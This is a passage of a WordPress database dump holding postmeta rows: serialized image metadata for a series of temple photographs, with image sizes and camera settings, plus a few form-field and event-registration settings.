:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_062-lg-550x366.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:366;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_062-lg-271x180.jpg\";s:5:\"width\";i:271;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_062-lg-451x300.jpg\";s:5:\"width\";i:451;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_062-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_062-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442659981\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:4:\"3200\";s:13:\"shutter_speed\";s:8:\"0.000625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25873,165280,'_wp_attached_file','2019/09/ECK_Temple_CO_063-lg.jpg'),(25874,165280,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_063-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_063-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_063-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_063-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_063-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_063-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_063-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_063-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_063-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_063-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_063-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_063-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DSC-HX200V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442655147\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.8\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25875,165281,'_wp_attached_file','2019/09/ECK_Temple_CO_064-lg.jpg'),(25876,165281,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:348;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_064-lg.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_064-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_064-lg-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_064-lg-348x250.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_064-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_064-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_064-lg-250x333.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:333;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_064-lg-135x180.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_064-lg-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_064-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_064-lg-348x285.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DSC-HX200V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442656886\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:5:\"14.88\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25877,165282,'_wp_attached_file','2019/09/ECK_Temple_CO_065-lg.jpg'),(25878,165282,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:348;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_065-lg.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_065-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_065-lg-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_065-lg-348x250.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_065-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_065-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_065-lg-250x333.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:333;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_065-lg-135x180.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_065-lg-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_065-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_065-lg-348x285.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25879,165283,'_wp_attached_file','2019/09/ECK_Temple_CO_066-lg.jpg'),(25880,165283,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_066-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_066-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_066-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_066-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_066-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_066-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_066-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_066-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_066-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_066-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_066-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_066-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DSC-HX200V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442656669\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"9.39\";s:3:\"iso\";s:3:\"500\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25881,165284,'_wp_attached_file','2019/09/ECK_Temple_CO_067-lg.jpg'),(25882,165284,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_067-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_067-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_067-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_067-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_067-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_067-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_067-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_067-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_067-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_067-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_067-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_067-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 6\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442659625\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"64\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25883,165285,'_wp_attached_file','2019/09/ECK_Temple_CO_068-lg.jpg'),(25884,165285,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:596;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_068-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_068-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_068-lg-300x233.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_068-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_068-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_068-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_068-lg-250x194.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_068-lg-550x427.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_068-lg-232x180.jpg\";s:5:\"width\";i:232;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_068-lg-386x300.jpg\";s:5:\"width\";i:386;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_068-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_068-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 6\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442692238\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25885,165286,'_wp_attached_file','2019/09/ECK_Temple_CO_069-lg.jpg'),(25886,165286,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_069-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_069-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_069-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_069-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_069-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_069-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_069-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_069-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_069-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_069-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_069-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_069-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DSC-HX200V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442662104\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.8\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25887,165287,'_wp_attached_file','2019/09/ECK_Temple_CO_070-lg.jpg'),(25888,165287,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_070-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_070-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_070-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_070-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_070-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_070-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_070-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_070-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_070-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_070-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_070-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_070-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DSC-HX200V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442656248\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.8\";s:3:\"iso\";s:3:\"500\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(95555,262061,'_field_180','Stevens'),(95554,262061,'_field_179','Catherine'),(121188,263208,'_RTECdeadlineType','start'),(121189,263208,'_RTECwhoCanRegister','any'),(121190,263208,'_RTEClimitRegistrations','0'),(121191,263208,'_RTECmaxRegistrations','30'),(121192,263208,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(121193,263208,'_RTECnumRegistered','0'),(121194,263208,'_EventVenueID','262435'),(121196,263208,'_dp_original','263203'),(121197,263208,'_edit_lock','1610245085:2'),(121198,263208,'_edit_last','2'),(128873,263459,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611754998;s:12:\"_EventOrigin\";i:1611754998;s:13:\"_thumbnail_id\";i:1611755387;s:24:\"boldgrid_hide_page_title\";i:1611754998;s:17:\"_EventShowMapLink\";i:1611754998;s:13:\"_EventShowMap\";i:1611754998;s:15:\"_EventStartDate\";i:1611755387;s:13:\"_EventEndDate\";i:1611755387;s:18:\"_EventStartDateUTC\";i:1611755387;s:16:\"_EventEndDateUTC\";i:1611755387;s:14:\"_EventDuration\";i:1611755387;s:20:\"_EventCurrencySymbol\";i:1611754998;s:22:\"_EventCurrencyPosition\";i:1611754998;s:10:\"_EventCost\";i:1611754998;s:9:\"_EventURL\";i:1611754998;s:14:\"_EventTimezone\";i:1611754998;s:18:\"_EventTimezoneAbbr\";i:1611754998;s:27:\"_EventNextPendingRecurrence\";i:1611754998;s:26:\"_RTECregistrationsDisabled\";i:1611754998;s:17:\"_RTECdeadlineType\";i:1611754998;s:19:\"_RTECwhoCanRegister\";i:1611754998;s:23:\"_RTEClimitRegistrations\";i:1611754998;s:21:\"_RTECmaxRegistrations\";i:1611754998;s:16:\"_EventRecurrence\";i:1611754998;s:18:\"_RTECnumRegistered\";i:1611754999;s:13:\"_EventVenueID\";i:1611754999;s:12:\"_dp_original\";i:1611754999;s:16:\"tribe_events_cat\";i:1611781382;s:10:\"_edit_last\";i:1611755021;s:12:\"post_content\";i:1611756114;s:10:\"post_title\";i:1611755097;s:11:\"post_status\";i:1611755387;}'